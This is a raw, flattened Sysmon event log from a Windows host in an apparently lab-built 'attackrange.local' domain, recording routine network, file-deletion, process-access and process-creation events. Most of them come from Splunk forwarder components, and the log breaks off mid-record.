354300x800000000000000036497496Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:04.207{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50538-false10.0.1.12-8089- 354300x800000000000000036497495Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:04.139{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50537-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497498Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:35.269{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52EF6EC9820FD63375C8B234872001E9,SHA256=9705B2ABD23CB6D9A17CD2A3BB1BD0CBFED876B231DEE230D84B66B68786E71F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497499Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:36.351{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2A2897843039156489164271E187084,SHA256=2E86E9399C1B0C32FEF092E4F635973AC77D5C466BC68BCE8FCFBA52ED631A79,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497509Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:37.919{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A0F1-6140-8356-04000000C801}5596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497508Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:37.919{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497507Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:37.919{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497506Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:37.919{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497505Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:37.919{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497504Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:37.919{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A0F1-6140-8356-04000000C801}5596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497503Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:37.919{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A0F1-6140-8356-04000000C801}5596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497502Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:37.904{B81B27B7-A0F1-6140-8356-04000000C801}5596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497501Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:37.369{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B833ED3806E82C223AF67A24FB7E2962,SHA256=7144445BDF2DD92D639E8F7D770285A6C08675754E91C28BA3611D1A298A267F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497500Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:06.936{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50539-false10.0.1.12-8000- 23542300x800000000000000036497522Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:38.934{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=053BED5C4A8BE1A77FACB3AE38331655,SHA256=1E0933F1059FE85309E9616773E5E22BCC21DEFACFAC525B4FA2AADB3DAC364A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497521Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:38.934{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1BD2422E2FD1EA73C7D1BB02DD162AFC,SHA256=D0A8A418097A4ED72ACCF6AF9385CCEA4E74244666A228DB0F2450AC532E8410,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497520Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:38.818{B81B27B7-A0F2-6140-8456-04000000C801}59643384C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497519Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:38.619{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A0F2-6140-8456-04000000C801}5964C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497518Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:38.619{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497517Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:38.619{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497516Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:38.619{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497515Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:38.619{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497514Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:38.619{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A0F2-6140-8456-04000000C801}5964C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497513Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:38.619{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A0F2-6140-8456-04000000C801}5964C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497512Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:38.604{B81B27B7-A0F2-6140-8456-04000000C801}5964C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497511Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:38.372{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16F2BDE0F695CD31EE12C24C9D637B16,SHA256=72960B429B15B66A1AC14A1D975B051ED24CE0EFEBFDB46D0B5555102E6BCC16,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497510Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:38.072{B81B27B7-A0F1-6140-8356-04000000C801}55966824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497535Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:39.590{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497534Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:39.590{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497533Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:39.590{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036497532Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:39.521{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CACB6C08A5E25123FF6A019E89807CC5,SHA256=BBB624DDB826A4C31C5D26BB7709AFE867D1B5B0ED2BF34B70DA615B013F87AF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497531Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:39.403{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B2B1BD3F96A1ED3265F80FF190198C0,SHA256=8D2EB5A84A2C08B6CC0C98DA69B2B997BEC59BFB2F4C28BD2B3D3DC7F178D23E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497530Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:39.318{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A0F3-6140-8556-04000000C801}720C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497529Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 